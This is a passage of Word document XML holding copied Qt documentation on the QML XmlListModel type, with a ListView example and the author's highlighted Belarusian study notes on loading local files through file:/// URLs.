          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pubDate</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attributes that match the</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pubDate</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>values of its corresponding</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;item&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. (See</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1645" w:anchor="query-prop" w:history="1">
        <w:r w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlRole::query</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more examples of valid XPath expressions for</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1646" w:history="1">
        <w:r w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlRole</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00B75670">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>model could be used in a</w:t>
      </w:r>
      <w:r w:rsidRPr="00B75670">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1647" w:history="1">
        <w:r w:rsidRPr="00B75670">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="00490E7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648" w:history="1">
        <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002736BE" w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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width</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w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>180</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height</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w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>300</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model</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xmlModel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">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736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delegate</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w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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text</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title </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w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>": "</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> pubDate </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002736BE">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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png"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"http://doc.qt.io/qt-5/images/qml-xmllistmodel-example.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1037" type="#_x0000_t75" alt="" style="width:273.6pt;height:57.6pt">
            <v:imagedata r:id="rId1649" r:href="rId1650"/>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Pr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D0F95" w:rsidRPr="004D0F95" w:rsidRDefault="008F1DE7" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="004D0F95" w:rsidRPr="004D0F95">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Доўга прыклад не атрымліваўся. Аказалася, што калі бярэш файл з лакальнай сітсэмы, то трэба урл задаваць вось так: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D0F95" w:rsidRPr="004D0F95" w:rsidRDefault="004D0F95" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0F95">
        <w:rPr>
          <w:color w:val="800000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0F95">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0F95">
        <w:rPr>
          <w:color w:val="C0C0C0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0F95">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"file:///C:/Users/Roman/Desktop/Programming/qt/QtStudyProject/1.png"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D0F95" w:rsidRPr="004D0F95" w:rsidRDefault="004D0F95" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D0F95">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">вось чаму варта практыкавацца пры навучанні. Я як бы прачытаў тэкст. Зразумеў. А паўтарыць аказалася не так проста, бо не ўсе нюансы тут напісалі. А калі б напісалі ўсе, то я бы прачытаў шмат лішняга для мяне, </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0F95">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>напрыклад, пра урл на іншых сістэмах, што аб’ектыўна мне не спатрэбіцца, а калі і спатрэбіцца, то я гэта хутка знайду. Гэта праблема тнав.</w:t>
      </w:r>
      <w:r w:rsidR="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002736BE" w:rsidRPr="002736BE" w:rsidRDefault="002736BE" w:rsidP="002736BE">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1651" w:anchor="xmllistmodel" w:history="1">
        <w:r w:rsidRPr="002736BE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XmlListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">data is </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loaded asynchronously</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidRPr="002736BE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1652" w:anchor="status-prop" w:history="1">
        <w:r w:rsidRPr="0068181D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>status</w:t>
